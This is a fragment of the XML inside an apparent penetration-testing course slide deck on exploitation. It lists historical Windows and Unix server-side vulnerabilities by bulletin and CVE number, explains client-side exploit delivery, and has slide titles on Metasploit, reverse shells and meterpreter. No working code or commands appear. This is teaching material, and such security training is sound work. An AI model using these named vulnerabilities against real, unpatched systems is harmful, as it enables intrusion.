                <a:gd name="T5" fmla="*/ 0 h 21600"/>
                <a:gd name="T6" fmla="*/ 4274 w 21600"/>
                <a:gd name="T7" fmla="*/ 0 h 21600"/>
                <a:gd name="T8" fmla="*/ 4274 w 21600"/>
                <a:gd name="T9" fmla="*/ 11631 h 21600"/>
                <a:gd name="T10" fmla="*/ 17326 w 21600"/>
                <a:gd name="T11" fmla="*/ 11631 h 21600"/>
                <a:gd name="T12" fmla="*/ 4274 w 21600"/>
                <a:gd name="T13" fmla="*/ 5816 h 21600"/>
                <a:gd name="T14" fmla="*/ 17326 w 21600"/>
                <a:gd name="T15" fmla="*/ 5816 h 21600"/>
                <a:gd name="T16" fmla="*/ 18828 w 21600"/>
                <a:gd name="T17" fmla="*/ 15785 h 21600"/>
                <a:gd name="T18" fmla="*/ 2772 w 21600"/>
                <a:gd name="T19" fmla="*/ 15785 h 21600"/>
                <a:gd name="T20" fmla="*/ 6194 w 21600"/>
                <a:gd name="T21" fmla="*/ 1913 h 21600"/>
                <a:gd name="T22" fmla="*/ 15565 w 21600"/>
                <a:gd name="T23" fmla="*/ 974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latin typeface="Calibri"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1100">
                <a:effectLst/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="SimSun"/>
                <a:cs typeface="Times New Roman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574951" y="86387"/>
              <a:ext cx="1082040" cy="51879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 b="1">
                  <a:effectLst/>
                  <a:ea typeface="SimSun"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>Firewall allows inbound</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1100">
                <a:effectLst/>
                <a:ea typeface="SimSun"/>
                <a:cs typeface="Times New Roman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286707" y="131673"/>
              <a:ext cx="814070" cy="48196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 b="1">
                  <a:effectLst/>
                  <a:ea typeface="SimSun"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>Target machine inbound</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1100">
                <a:effectLst/>
                <a:ea typeface="SimSun"/>
                <a:cs typeface="Times New Roman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1207008" y="343814"/>
              <a:ext cx="307911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9372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Notable Windows Server-Side Exploits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Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>services </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MS-RPC-DCOM:  MS  03-026 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LSASS:  MS  04-11 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uPNP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:  MS  05-039 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RRAS:  MS  06-025 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server  Service:  MS  06-040 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server  Service:  MS  08-067 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Approximately  one  or  two  big  ones  per  year</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other Microsoft products  on  Windows </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IIS:  Numerous  examples </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data  Backup  Products </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Veritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,  CA  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Brightstor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,  and  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Arkeia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Virtual  Network  Computing  VNC </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication  bypass  flaw  from  2006,  and  other  flaws,  often  not  patched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91045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Notable Linux and Unix Server-Side Exploits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smtClean="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and Unix services:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Solaris </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sadmind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command execution flaw, CVE-2003-0722</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Solaris and Mac OS X Samba buffer overflow, CVE-2003-0201</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mac OS X Apple File Share buffer overflow, CVE-2004-0430</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux Squid NTLM Authentication buffer overflow, CVE-2004-</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0541</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HP-UX LPD service command execution, CVE-2005-3277</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Numerous Linux flaws in CGT and PHP scripts for webservers, including:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Awstats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> CGT, PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, PHP XML-RPC, PHP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vBulletin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8185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Client-Side Exploits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Client-side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exploits  wait  for  a  client  application  to  access  attacker-supplied  response/file,  then  deliver an  exploit </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More  plentiful  in  recent  years </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For pen  tests  with  client-side  exploits  in  scope,  compromise is  almost  always  successful</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="228600" y="4724400"/>
            <a:ext cx="8610599" cy="1905000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6649108" cy="891992"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Group 4"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="6649108" cy="891992"/>
              <a:chOff x="0" y="73053"/>
              <a:chExt cx="6649682" cy="891992"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Text Box 2"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5075279" y="73053"/>
                <a:ext cx="1574403" cy="70967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>
                    <a:effectLst/>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="SimSun"/>
                    <a:cs typeface="Times New Roman"/>
                  </a:rPr>
                  <a:t>User accesses content from attacker controlled system</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Text Box 2"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="95095"/>
                <a:ext cx="987425" cy="86995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>
                    <a:effectLst/>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="SimSun"/>
                    <a:cs typeface="Times New Roman"/>
                  </a:rPr>
                  <a:t>Attackers waiting to serve exploit</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="Text Box 2"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1310733" y="277975"/>
                <a:ext cx="1249603" cy="65836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>
                    <a:effectLst/>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="SimSun"/>
                    <a:cs typeface="Times New Roman"/>
                  </a:rPr>
                  <a:t>Delivers exploit as part of response code</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="computr2"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="790042" y="95097"/>
                <a:ext cx="520700" cy="575310"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10800 w 21600"/>
                  <a:gd name="T1" fmla="*/ 0 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10800 w 21600"/>
                  <a:gd name="T3" fmla="*/ 21600 h 21600"/>
                  <a:gd name="T4" fmla="*/ 17326 w 21600"/>
                  <a:gd name="T5" fmla="*/ 0 h 21600"/>
                  <a:gd name="T6" fmla="*/ 4274 w 21600"/>
                  <a:gd name="T7" fmla="*/ 0 h 21600"/>
                  <a:gd name="T8" fmla="*/ 4274 w 21600"/>
                  <a:gd name="T9" fmla="*/ 11631 h 21600"/>
                  <a:gd name="T10" fmla="*/ 17326 w 21600"/>
                  <a:gd name="T11" fmla="*/ 11631 h 21600"/>
                  <a:gd name="T12" fmla="*/ 4274 w 21600"/>
                  <a:gd name="T13" fmla="*/ 5816 h 21600"/>
                  <a:gd name="T14" fmla="*/ 17326 w 21600"/>
                  <a:gd name="T15" fmla="*/ 5816 h 21600"/>
                  <a:gd name="T16" fmla="*/ 18828 w 21600"/>
                  <a:gd name="T17" fmla="*/ 15785 h 21600"/>
                  <a:gd name="T18" fmla="*/ 2772 w 21600"/>
                  <a:gd name="T19" fmla="*/ 15785 h 21600"/>
                  <a:gd name="T20" fmla="*/ 6194 w 21600"/>
                  <a:gd name="T21" fmla="*/ 1913 h 21600"/>
                  <a:gd name="T22" fmla="*/ 15565 w 21600"/>
                  <a:gd name="T23" fmla="*/ 974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 extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="21022" y="20295"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="18828" y="18396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18828" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15478" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15478" y="11631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17326" y="11631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17326" y="11156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17326" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10858" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4274" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4274" y="11037"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4274" y="11631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6122" y="11631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6122" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2772" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2772" y="18514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="20295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="20413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="20651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="20888"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="21363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="21481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="21481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10858" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20907" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21138" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21253" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21369" y="21481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21484" y="21481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21600" y="21363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21600" y="21244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21600" y="21125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21484" y="20888"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21369" y="20651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21253" y="20413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21022" y="20295"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="21600" h="21600" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="18019" y="18514"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17326" y="17921"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4389" y="17921"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3696" y="18514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18019" y="18514"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="21600" h="21600" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="19174" y="19701"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="18481" y="19108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3119" y="19108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2426" y="19701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19174" y="19701"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="21600" h="21600" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="20560" y="20769"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="19867" y="20176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1848" y="20176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1155" y="20769"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20560" y="20769"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="21600" h="21600" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="18828" y="18396"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17442" y="17209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4158" y="17209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2772" y="18514"/>
                    </a:lnTo>
                    <a:moveTo>
                      <a:pt x="13168" y="14123"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13168" y="14716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17788" y="14716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17788" y="14123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13168" y="14123"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="21600" h="21600" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="6122" y="1899"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6122" y="9732"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15478" y="9732"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15478" y="1899"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6122" y="1899"/>
                    </a:lnTo>
                    <a:moveTo>
                      <a:pt x="6122" y="11631"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="15478" y="11631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15478" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6122" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6122" y="11631"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF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>
                    <a:effectLst/>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Times New Roman"/>
                    <a:cs typeface="Times New Roman"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1100">
                  <a:effectLst/>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="SimSun"/>
                  <a:cs typeface="Times New Roman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2574951" y="109728"/>
                <a:ext cx="1082040" cy="51879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600" b="1" dirty="0">
                    <a:effectLst/>
                    <a:ea typeface="SimSun"/>
                    <a:cs typeface="Times New Roman"/>
                  </a:rPr>
                  <a:t>Firewall allows outbound</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                  <a:effectLst/>
                  <a:ea typeface="SimSun"/>
                  <a:cs typeface="Times New Roman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4286707" y="131673"/>
                <a:ext cx="814070" cy="481965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b="1" dirty="0">
                    <a:effectLst/>
                    <a:ea typeface="SimSun"/>
                    <a:cs typeface="Times New Roman"/>
                  </a:rPr>
                  <a:t>Target </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                    <a:effectLst/>
                    <a:ea typeface="SimSun"/>
                    <a:cs typeface="Times New Roman"/>
                  </a:rPr>
                  <a:t>machine</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:effectLst/>
                  <a:ea typeface="SimSun"/>
                  <a:cs typeface="Times New Roman"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Freeform 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1104595" y="102413"/>
              <a:ext cx="3182113" cy="234086"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 3182113 w 3182113"/>
                <a:gd name="connsiteY0" fmla="*/ 234086 h 234086"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 3182113"/>
                <a:gd name="connsiteY1" fmla="*/ 182880 h 234086"/>
                <a:gd name="connsiteX2" fmla="*/ 3167483 w 3182113"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 234086"/>
                <a:gd name="connsiteX3" fmla="*/ 3167483 w 3182113"/>
                <a:gd name="connsiteY3" fmla="*/ 0 h 234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82113" h="234086">
                  <a:moveTo>
                    <a:pt x="3182113" y="234086"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1592276" y="227990"/>
                    <a:pt x="2439" y="221894"/>
                    <a:pt x="1" y="182880"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-2437" y="143866"/>
                    <a:pt x="3167483" y="0"/>
                    <a:pt x="3167483" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3167483" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:cu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47062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2237</TotalTime>
  <Words>2519</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>405</Paragraphs>
  <Slides>49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6" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>SimSun</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>       EXPLOITATION      </vt:lpstr>
      <vt:lpstr> What is Exploitation? </vt:lpstr>
      <vt:lpstr> Why Exploitation? </vt:lpstr>
      <vt:lpstr>Risks of Exploitation</vt:lpstr>
      <vt:lpstr> Categories of Exploits </vt:lpstr>
      <vt:lpstr>Server-Side Exploits</vt:lpstr>
      <vt:lpstr>Notable Windows Server-Side Exploits</vt:lpstr>
      <vt:lpstr>Notable Linux and Unix Server-Side Exploits</vt:lpstr>
      <vt:lpstr>Client-Side Exploits</vt:lpstr>
      <vt:lpstr>Notable Client-Side Exploits</vt:lpstr>
      <vt:lpstr>Determining Client-Side  Programs In use</vt:lpstr>
      <vt:lpstr>Client-Side Software Inventory Tools</vt:lpstr>
      <vt:lpstr>Making Client Software Testing  Access Systems</vt:lpstr>
      <vt:lpstr>Local Privilege Escalation</vt:lpstr>
      <vt:lpstr>Local Privilege Escalation Attack Categories</vt:lpstr>
      <vt:lpstr>Metasploit Exploitation Framework</vt:lpstr>
      <vt:lpstr>The Metasploit Arsenal </vt:lpstr>
      <vt:lpstr>Exploit</vt:lpstr>
      <vt:lpstr>Payload</vt:lpstr>
      <vt:lpstr>Auxiliary</vt:lpstr>
      <vt:lpstr> Tour of Metasploit </vt:lpstr>
      <vt:lpstr>Look inside MSF Components via file system</vt:lpstr>
      <vt:lpstr>THE JOY OF EXPLOTTAION</vt:lpstr>
      <vt:lpstr>Basic Exploitation</vt:lpstr>
      <vt:lpstr>Basic Exploitation…</vt:lpstr>
      <vt:lpstr>Reverse vs. Bind Shell</vt:lpstr>
      <vt:lpstr>Exercise Metasploit</vt:lpstr>
      <vt:lpstr>…</vt:lpstr>
      <vt:lpstr>Exercise 2</vt:lpstr>
      <vt:lpstr>Exercise 3</vt:lpstr>
      <vt:lpstr>…</vt:lpstr>
      <vt:lpstr> Social Engineering Attack </vt:lpstr>
      <vt:lpstr>The meterpreter</vt:lpstr>
      <vt:lpstr>Meterpreter: Functionality </vt:lpstr>
      <vt:lpstr>File System Commands</vt:lpstr>
      <vt:lpstr>Process Commands </vt:lpstr>
      <vt:lpstr>Network Commands</vt:lpstr>
      <vt:lpstr>Target Machine Console Interface</vt:lpstr>
      <vt:lpstr>Meterpreter Exercise </vt:lpstr>
      <vt:lpstr>…</vt:lpstr>
      <vt:lpstr>Try the following Meterpreter commands</vt:lpstr>
      <vt:lpstr>…</vt:lpstr>
      <vt:lpstr>Finishing the Recon Phase</vt:lpstr>
      <vt:lpstr> Bonus 1 </vt:lpstr>
      <vt:lpstr>…</vt:lpstr>
      <vt:lpstr>Bonus 2</vt:lpstr>
      <vt:lpstr>Bonus 3</vt:lpstr>
      <vt:lpstr>…</vt:lpstr>
      <vt:lpstr>QUIZ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      RECONNAISSANCE      </dc:title>
  <dc:creator>ismail - [2010]</dc:creator>
  <cp:lastModifiedBy>nebfikru nebfikru</cp:lastModifiedBy>
  <cp:revision>230</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-03-09T23:21:08Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-01T09:11:02Z</dcterms:modified>
</cp:coreProperties>
</file>